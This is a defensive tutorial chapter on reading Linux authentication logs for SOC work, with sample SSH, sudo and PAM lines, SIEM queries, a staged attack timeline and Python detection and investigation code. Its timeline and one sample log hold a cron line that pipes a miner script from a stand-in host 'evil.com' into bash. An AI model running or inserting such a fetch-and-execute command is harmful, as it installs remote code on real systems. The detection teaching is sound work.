Authentication Logs

Authentication logs are one of the most valuable log sources on Linux systems. They record SSH login attempts, sudo usage, su switching, PAM authentication processes, and user session activity. For SOC analysts, Linux authentication logs are the first place to detect brute force, password spraying, privilege escalation, account misuse, lateral movement, and insider attacks.

This chapter provides a full-scale, ultra-practical, SOC-grade breakdown of Linux authentication logs with real raw samples, SIEM queries, field interpretation, and attack timelines.


Where Authentication Logs Are Stored

Location varies by distro:

Debian/Ubuntu:

/var/log/auth.log

RHEL/CentOS/Amazon Linux:

/var/log/secure

These files contain nearly all authentication-related events:

  • SSH logins

  • sudo usage

  • su attempts

  • PAM events

  • key-based authentication

  • failed login reasons

  • remote access attempts


Core Authentication Events (Real Linux Log Samples)

Below are real raw logs exactly as SOC analysts see them.


1. SSH Failed Login (Brute Force Indicator)

Jan 10 01:44:12 ubuntu sshd[1441]: Failed password for root from 185.33.21.88 port 51222 ssh2

Interpretation:

  • “Failed password” = one failed authentication; repeated failures from the same source indicate brute force

  • Target user = root

  • Source IP = the attacking host (the first value to pivot on)

  • Port = ephemeral, but useful for correlation


2. Successful SSH Login

Jan 10 01:45:03 ubuntu sshd[1477]: Accepted password for mayur from 185.33.21.88 port 51234 ssh2

Interpretation:

  • If preceded by brute force → compromise

  • If from unusual country/IP → credential theft


3. Key-Based Login

Jan 10 02:11:42 ubuntu sshd[1521]: Accepted publickey for devops from 10.0.0.15 port 51111 ssh2

Interpretation:

  • Key authentication → usually privileged automation, but also how an attacker with a stolen private key logs in


4. Sudo Command Execution (Privilege Escalation)

Jan 10 01:46:12 ubuntu sudo: mayur : TTY=pts/0 ; COMMAND=/bin/bash

Interpretation:

  • User escalated to root

  • SOC must verify legitimacy

  • Often used to install malware, modify configs, dump secrets


5. su Command (Switch User)

Jan 10 03:01:10 ubuntu su: pam_unix(su:session): session opened for user root by mayur(uid=1001)

Interpretation:

  • User “mayur” switched to root

  • Equivalent to privilege escalation


6. Account Lockout (Multiple Failures)

pam_tally2(sshd:auth): user root tally 10, deny 10

Interpretation:

  • Too many failed attempts

  • Password spraying or botnet brute force


7. Invalid User Login Attempts

Jan 10 01:50:33 ubuntu sshd[1499]: Invalid user admin from 185.22.11.44

Interpretation:

  • Attackers scanning for default accounts


8. SSH Session Close

Jan 10 02:00:22 ubuntu sshd[1477]: pam_unix(sshd:session): session closed for user mayur

Useful for reconstructing timelines.


9. TTY Shell Spawned

Jan 10 01:46:13 ubuntu sudo: pam_unix(sudo:session): session opened for user root

This marks the start of root-level activity.
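The nine samples above share one syslog-style header and a small set of message shapes, so they can be normalised into fields before any query runs. The parser below is an added example written for this chapter, not code from the original; the event names (ssh_failed, sudo_command, ...) and the AuthEvent structure are my own choices. It feeds on the chapter's own sample lines, including the header-less pam_tally2 and useradd ones, and drops anything it does not recognise. Note that distributions shipping Linux-PAM 1.5 or later have removed pam_tally2 in favour of pam_faillock, whose lockout message is worded differently, so that one pattern needs extending on such systems.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Syslog-style header shared by auth.log and /var/log/secure lines, e.g.
#   "Jan 10 01:44:12 ubuntu sshd[1441]: Failed password for ..."
# Timestamp, host and "program[pid]:" are each optional so that the chapter's
# header-less samples (pam_tally2, useradd) still parse on a best-effort basis.
SYSLOG_RE = re.compile(
    r"^(?:(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) )?"
    r"(?:(?P<prog>[\w.-]+)(?:\[(?P<pid>\d+)\])?: )?(?P<msg>.*)$"
)

# Message-body patterns, tried in order, each mapped to a normalised event name.
# Port is optional so the abbreviated "Failed password for root from <IP>" form parses too.
# The useradd pattern also accepts the real format "new user: name=hacker, UID=1002, ...".
MESSAGE_PATTERNS = [
    ("ssh_failed", re.compile(
        r"^Failed (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)(?: port (?P<port>\d+))?")),
    ("ssh_accepted", re.compile(
        r"^Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+)(?: port (?P<port>\d+))?")),
    ("ssh_invalid_user", re.compile(r"^Invalid user (?P<user>\S+) from (?P<ip>\S+)")),
    ("session_opened", re.compile(
        r"^pam_unix\((?P<service>\w+):session\): session opened for user (?P<user>\S+)"
        r"(?: by (?P<by>\w+)\(uid=(?P<uid>\d+)\))?")),
    ("session_closed", re.compile(
        r"^pam_unix\((?P<service>\w+):session\): session closed for user (?P<user>\S+)")),
    ("account_lockout", re.compile(
        r"^pam_tally2\((?P<service>\w+):auth\): user (?P<user>\S+) tally (?P<tally>\d+), deny (?P<deny>\d+)")),
    ("sudo_command", re.compile(r"^(?P<user>\S+) : .*COMMAND=(?P<command>.+)$")),
    ("user_created", re.compile(r"^new user(?: |: name=)(?P<user>[^, ]+)")),
]


@dataclass
class AuthEvent:
    event: str               # normalised name, e.g. "ssh_failed"
    timestamp: Optional[str]  # None when the line carried no syslog header
    host: Optional[str]
    program: Optional[str]
    pid: Optional[int]
    fields: dict              # event-specific values: user, ip, port, method, command, ...
    raw: str


def parse_line(line: str) -> Optional[AuthEvent]:
    """Normalise one auth.log line; return None for lines this parser does not know."""
    head = SYSLOG_RE.match(line.strip())
    for name, pattern in MESSAGE_PATTERNS:
        m = pattern.match(head["msg"])
        if m:
            return AuthEvent(
                event=name,
                timestamp=head["ts"],
                host=head["host"],
                program=head["prog"],
                pid=int(head["pid"]) if head["pid"] else None,
                fields={k: v for k, v in m.groupdict().items() if v is not None},
                raw=line,
            )
    return None


def parse_lines(lines):
    """Parse many lines, skipping the ones that are not authentication events."""
    return [ev for ev in map(parse_line, lines) if ev is not None]


# The nine raw samples from this chapter, plus its useradd line from the attack-pattern section.
SAMPLE_LINES = [
    "Jan 10 01:44:12 ubuntu sshd[1441]: Failed password for root from 185.33.21.88 port 51222 ssh2",
    "Jan 10 01:45:03 ubuntu sshd[1477]: Accepted password for mayur from 185.33.21.88 port 51234 ssh2",
    "Jan 10 02:11:42 ubuntu sshd[1521]: Accepted publickey for devops from 10.0.0.15 port 51111 ssh2",
    "Jan 10 01:46:12 ubuntu sudo: mayur : TTY=pts/0 ; COMMAND=/bin/bash",
    "Jan 10 03:01:10 ubuntu su: pam_unix(su:session): session opened for user root by mayur(uid=1001)",
    "pam_tally2(sshd:auth): user root tally 10, deny 10",
    "Jan 10 01:50:33 ubuntu sshd[1499]: Invalid user admin from 185.22.11.44",
    "Jan 10 02:00:22 ubuntu sshd[1477]: pam_unix(sshd:session): session closed for user mayur",
    "Jan 10 01:46:13 ubuntu sudo: pam_unix(sudo:session): session opened for user root",
    "useradd[1552]: new user hacker created",
]

if __name__ == "__main__":
    for ev in parse_lines(SAMPLE_LINES):
        print(f"{ev.timestamp or '-':>15}  {ev.event:<17} {ev.fields}")
```

Once lines are in this shape, every query in the chapter becomes a filter on `event` plus a group-by on `fields["ip"]` or `fields["user"]`, which is exactly what a SIEM does after ingestion.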


Understanding PAM (Pluggable Authentication Modules)

Authentication logs contain entries from PAM, the Linux authentication framework.

Typical messages:

pam_unix(sshd:auth)
pam_unix(sudo:session)

PAM logs tell you:

  • Which authentication module was used

  • Whether authentication succeeded or failed

  • Whether session opened or closed

SOC analysts track PAM chains to detect privilege escalation.


Attack Behavior Visible in Authentication Logs

Below are real attack patterns SOC analysts detect.


1. SSH Brute Force

Repeated:

Failed password for root from <IP>

Followed by:

Accepted password for root

This chain = compromise.


2. Password Spraying

Logs show:

Failed password for admin
Failed password for test
Failed password for oracle
Failed password for postgres

Different users, same password attempt → spraying.


3. Compromised User Account

Signs:

Accepted password for user from unusual IP
sudo: user executed root commands
bash: user downloaded suspicious file

Combine SSH + sudo + command logs.


4. Lateral Movement (SSH Pivoting)

The attacker connects from an internal host:

Accepted password for root from 10.0.0.25

A private (internal) source address means the attacker is already inside the network, pivoting from a compromised host.


5. Privilege Escalation

Indicator:

sudo: mayur : COMMAND=/bin/bash

If user is non-admin → suspicious.


6. Persistence Through SSH Keys

Attacker injects public keys:

AuthorizedKeysCommand: added key for root

Immediate persistence mechanism.


7. New User Creation

If attackers gain root:

useradd[1552]: new user hacker created

Creates permanent access.


SIEM Detection Queries (Practical)

Detect SSH brute force

message:"Failed password" AND program:sshd AND source.ip:<same_ip>

Detect successful login after failures

(source.ip:"185.*" AND message:"Failed password")
THEN message:"Accepted password"

Detect privilege escalation

program:sudo AND message:COMMAND

Detect new user creation

message:"new user"

Detect login from country not normally used

geoip.country_name != "India" AND program:sshd AND message:"Accepted password"

Detect key-based authentication

message:"Accepted publickey"
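The queries above are written as pseudo-queries (THEN is not an operator in any common SIEM language, and `source.ip:<same_ip>` stands for a group-by on the source address), so the stateful part, remembering per-IP failures long enough to pair them with a later success, is left to the reader. The code below is an added example, not from the chapter or any SIEM vendor, that implements the brute-force, failed-then-accepted, password-spraying and internal-login patterns from the attack-behaviour section as rules over sample sshd lines. The thresholds, the ten-minute window and the log lines are constructed for the example; the country rule is omitted because it needs a GeoIP database.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The two sshd outcomes the chapter's queries key on ("Failed ..." / "Accepted ...").
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} {1,2}\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Rule parameters a SIEM would expose as tunables (illustrative values, not from the chapter).
BRUTE_FORCE_FAILURES = 5                     # failures from one source IP ...
BRUTE_FORCE_WINDOW = timedelta(minutes=10)   # ... within this sliding window
SPRAY_DISTINCT_USERS = 4                     # distinct usernames failed from one source IP


def parse_sshd(lines):
    """Yield (time, outcome, method, user, ip) for every sshd password/publickey result.
    auth.log timestamps carry no year, so strptime yields year 1900; differences within
    one file are still correct except across a New Year rollover."""
    for line in lines:
        m = SSHD_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["outcome"], m["method"], m["user"], m["ip"]


def detect(lines):
    """Run the chapter's detections over raw lines (assumed in log order) and return
    alerts as (rule, source_ip, detail) tuples in the order they fire."""
    alerts = []
    failures = defaultdict(list)      # ip -> timestamps of failures inside the window
    failed_users = defaultdict(set)   # ip -> usernames that failed from it
    fired = set()                     # (rule, ip) pairs already raised, so each fires once per IP
    for ts, outcome, method, user, ip in parse_sshd(lines):
        # Expire failures that fell out of the window before evaluating any rule.
        failures[ip] = [t for t in failures[ip] if ts - t <= BRUTE_FORCE_WINDOW]
        if outcome == "Failed":
            failures[ip].append(ts)
            failed_users[ip].add(user)
            # "Failed password" grouped by source IP: brute force.
            if len(failures[ip]) >= BRUTE_FORCE_FAILURES and ("ssh_brute_force", ip) not in fired:
                fired.add(("ssh_brute_force", ip))
                alerts.append(("ssh_brute_force", ip, f"{len(failures[ip])} failures within {BRUTE_FORCE_WINDOW}"))
            # Same source, many different usernames: password spraying.
            if len(failed_users[ip]) >= SPRAY_DISTINCT_USERS and ("password_spraying", ip) not in fired:
                fired.add(("password_spraying", ip))
                alerts.append(("password_spraying", ip, "users: " + ", ".join(sorted(failed_users[ip]))))
        else:
            # The "Failed ... THEN Accepted" sequence from the same IP.
            if len(failures[ip]) >= BRUTE_FORCE_FAILURES:
                alerts.append(("success_after_brute_force", ip,
                               f"{user} via {method} after {len(failures[ip])} failures"))
            # Lateral-movement review: a root login arriving from an internal address.
            if user == "root" and ipaddress.ip_address(ip).is_private:
                alerts.append(("internal_root_login", ip, f"root via {method} from private address"))
    return alerts


# Constructed sample modelled on the chapter's timeline: a brute force that succeeds,
# a spray against default account names, a normal key login, and an internal root login.
SAMPLE_LOG = """\
Jan 10 01:44:12 ubuntu sshd[1441]: Failed password for root from 185.99.22.11 port 51555 ssh2
Jan 10 01:44:13 ubuntu sshd[1443]: Failed password for root from 185.99.22.11 port 51557 ssh2
Jan 10 01:44:14 ubuntu sshd[1445]: Failed password for root from 185.99.22.11 port 51559 ssh2
Jan 10 01:44:15 ubuntu sshd[1447]: Failed password for root from 185.99.22.11 port 51561 ssh2
Jan 10 01:44:16 ubuntu sshd[1449]: Failed password for root from 185.99.22.11 port 51563 ssh2
Jan 10 01:44:17 ubuntu sshd[1451]: Failed password for root from 185.99.22.11 port 51565 ssh2
Jan 10 01:45:03 ubuntu sshd[1477]: Accepted password for root from 185.99.22.11 port 51600 ssh2
Jan 10 01:50:01 ubuntu sshd[1499]: Failed password for invalid user admin from 203.0.113.7 port 40001 ssh2
Jan 10 01:50:02 ubuntu sshd[1501]: Failed password for invalid user test from 203.0.113.7 port 40002 ssh2
Jan 10 01:50:03 ubuntu sshd[1503]: Failed password for invalid user oracle from 203.0.113.7 port 40003 ssh2
Jan 10 01:50:04 ubuntu sshd[1505]: Failed password for postgres from 203.0.113.7 port 40004 ssh2
Jan 10 02:11:42 ubuntu sshd[1521]: Accepted publickey for devops from 10.0.0.15 port 51111 ssh2
Jan 10 02:30:00 ubuntu sshd[1600]: Accepted password for root from 10.0.0.25 port 52000 ssh2
""".splitlines()

if __name__ == "__main__":
    for rule, ip, detail in detect(SAMPLE_LOG):
        print(f"{rule:<26} {ip:<14} {detail}")
```

The window is what separates a real rule from the bare `message:"Failed password"` query: without it a slow, months-long trickle of failures would either never alert or alert forever. The internal-root rule is deliberately a review signal rather than a verdict, because whether `Accepted password for root from 10.0.0.25` is compromise depends on the baseline for that host.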


Complete Attack Timeline Using Authentication Logs (Practical Case)

Step 1: Brute Force

Failed password for root from 185.99.22.11 port 51555
Failed password for root from 185.99.22.11 port 51557
...

Step 2: Successful Login

Accepted password for root from 185.99.22.11

Step 3: Privilege Escalation

sudo: root : COMMAND=/bin/bash

Step 4: Backdoor Installed

CRON: (root) CMD (/usr/bin/curl http://evil.com/miner.sh | bash)

Step 5: Persistence

useradd: new user "backupadmin"

Step 6: Covering Tracks

sshd: session closed for user root
logrotate: rotated /var/log/auth.log

Authentication logs, read alongside the cron and syslog entries they lead to, expose every step from brute force to persistence.


Analyst Investigation Workflow for Authentication Logs

  1. Start with the suspicious IP

  2. Count failed login attempts

  3. Identify accepted logins

  4. Check for sudo or su escalations

  5. Correlate with process logs (/var/log/syslog, bash history)

  6. Check cron and user creation logs

  7. Check for persistence (SSH keys, cron, services)

  8. Build a timeline of attacker activity

  9. Mark the session as compromised if malicious patterns are found

  10. Escalate to IR team

This is actual SOC practice.
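The ten steps above are a single pivot: start from one source IP, count its failures, find the account it actually logged in as, follow that account through su/sudo into root, and collect what root then did. The function below is an added example written for this chapter, not the chapter's own code, that carries the workflow through on a constructed log modelled on the attack timeline case. The verdict threshold and the set of persistence programs are assumptions; the lines are assumed to be in log order, as auth.log is. The SSH-key persistence step is not pivoted on here because appending to ~/.ssh/authorized_keys produces no auth.log line by itself; it surfaces later as an `Accepted publickey` login, and a file-integrity or auditd watch on that file is the complementary source.

```python
import re
from datetime import datetime

# Syslog header shared by auth.log lines: "Jan 10 01:45:03 web01 sshd[1477]: <msg>"
HEADER_RE = re.compile(
    r"^(?P<ts>\w{3} {1,2}\d{1,2} \d\d:\d\d:\d\d) \S+ (?P<prog>[\w.-]+)(?:\[\d+\])?: (?P<msg>.*)$"
)
SSH_AUTH_RE = re.compile(
    r"^(?P<outcome>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)
# "session opened for user root by mayur(uid=1001)": the PAM chain that records who became whom.
SWITCH_RE = re.compile(r"session opened for user (?P<to>\w+)(?:\(uid=\d+\))? by (?P<by>\w+)\(uid=\d+\)")
PERSISTENCE_PROGS = {"useradd", "usermod", "CRON"}   # workflow steps 6 and 7
BRUTE_THRESHOLD = 5                                   # failures that turn a later success into a compromise


def investigate_ip(lines, ip):
    """Workflow steps 1-9 for one source IP. Returns failure count, accepted logins,
    an ordered timeline of (seconds since first login, program, message) and a verdict."""
    failures, accepted, timeline = 0, [], []
    pivot_users, t0 = set(), None
    for line in lines:
        h = HEADER_RE.match(line)
        if not h:
            continue
        ts = datetime.strptime(h["ts"], "%b %d %H:%M:%S")  # no year in auth.log; fine for deltas
        prog, msg = h["prog"], h["msg"]
        auth = SSH_AUTH_RE.match(msg) if prog == "sshd" else None
        if auth and auth["ip"] == ip:
            if auth["outcome"] == "Failed":
                failures += 1                                  # step 2
                continue
            accepted.append((ts.strftime("%H:%M:%S"), auth["user"]))  # step 3
            pivot_users.add(auth["user"])
            t0 = t0 or ts
        if t0 is None:
            continue                                            # nothing to follow before a login
        # Step 4: extend the pivot through su/sudo switches made by a pivot user.
        sw = SWITCH_RE.search(msg)
        if sw and sw["by"] in pivot_users:
            pivot_users.add(sw["to"])
        if prog == "sudo" and msg.split(" : ")[0].strip() in pivot_users:
            pivot_users.add("root")  # sudo targets root unless USER= says otherwise (assumption)
        # Steps 5-8: keep lines naming a pivot user, plus persistence events once the session holds root.
        names_user = any(re.search(rf"\b{re.escape(u)}\b", msg) for u in pivot_users)
        if names_user or (prog in PERSISTENCE_PROGS and "root" in pivot_users):
            timeline.append((int((ts - t0).total_seconds()), prog, msg))
    # Step 9: a login preceded by a brute force, or followed by persistence, is a compromise.
    persistence = any(p in PERSISTENCE_PROGS for _, p, _ in timeline)
    if accepted and (failures >= BRUTE_THRESHOLD or persistence):
        verdict = "compromised"
    elif accepted:
        verdict = "review"
    else:
        verdict = "no_login"
    return {"ip": ip, "failed_logins": failures, "accepted_logins": accepted,
            "timeline": timeline, "verdict": verdict}


# Constructed sample modelled on the chapter's timeline case, with an unrelated
# devops key login interleaved to show what the pivot leaves out.
SAMPLE_LOG = """\
Jan 10 01:44:12 web01 sshd[1441]: Failed password for root from 185.99.22.11 port 51555 ssh2
Jan 10 01:44:13 web01 sshd[1443]: Failed password for root from 185.99.22.11 port 51557 ssh2
Jan 10 01:44:14 web01 sshd[1445]: Failed password for root from 185.99.22.11 port 51559 ssh2
Jan 10 01:44:15 web01 sshd[1447]: Failed password for root from 185.99.22.11 port 51561 ssh2
Jan 10 01:44:16 web01 sshd[1449]: Failed password for root from 185.99.22.11 port 51563 ssh2
Jan 10 01:44:30 web01 sshd[1460]: Accepted publickey for devops from 10.0.0.15 port 51111 ssh2
Jan 10 01:45:03 web01 sshd[1477]: Accepted password for root from 185.99.22.11 port 51600 ssh2
Jan 10 01:45:03 web01 sshd[1477]: pam_unix(sshd:session): session opened for user root
Jan 10 01:46:12 web01 sudo: root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/bin/bash
Jan 10 01:47:00 web01 CRON[1600]: (root) CMD (/usr/bin/curl http://evil.com/miner.sh | bash)
Jan 10 01:48:10 web01 useradd[1552]: new user: name=backupadmin, UID=1002, GID=1002, home=/home/backupadmin, shell=/bin/bash
Jan 10 01:49:00 web01 sshd[1477]: pam_unix(sshd:session): session closed for user root
Jan 10 01:50:00 web01 sshd[1700]: Accepted publickey for devops from 10.0.0.15 port 51200 ssh2
""".splitlines()

if __name__ == "__main__":
    report = investigate_ip(SAMPLE_LOG, "185.99.22.11")
    print(f"{report['ip']}: {report['failed_logins']} failures, logins {report['accepted_logins']}, "
          f"verdict {report['verdict']}")
    for offset, prog, msg in report["timeline"]:
        print(f"  +{offset:>4}s  {prog:<8} {msg}")
```

Running it on the devops address instead returns only the two key logins and a verdict of `review`, because nothing the sudo, cron or useradd lines record is attributable to that session. That asymmetry is the point of pivoting on the user the login produced rather than grepping for everything that happened after it.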


Intel Dump

  • Linux authentication logs live in /var/log/auth.log or /var/log/secure.

  • Critical entries include SSH failures, successful logins, sudo usage, su switching, PAM events.

  • Key attack indicators include brute force, spraying, privilege escalation, lateral movement, and persistence creation.

  • Real logs show raw SSH login events, sudo commands, new users, cron persistence, and shell activity.

  • SIEM queries detect brute force, compromised accounts, key-based logins, and privilege misuse.

  • Authentication logs often reveal the entire compromise timeline from login attempt to root-level activity.
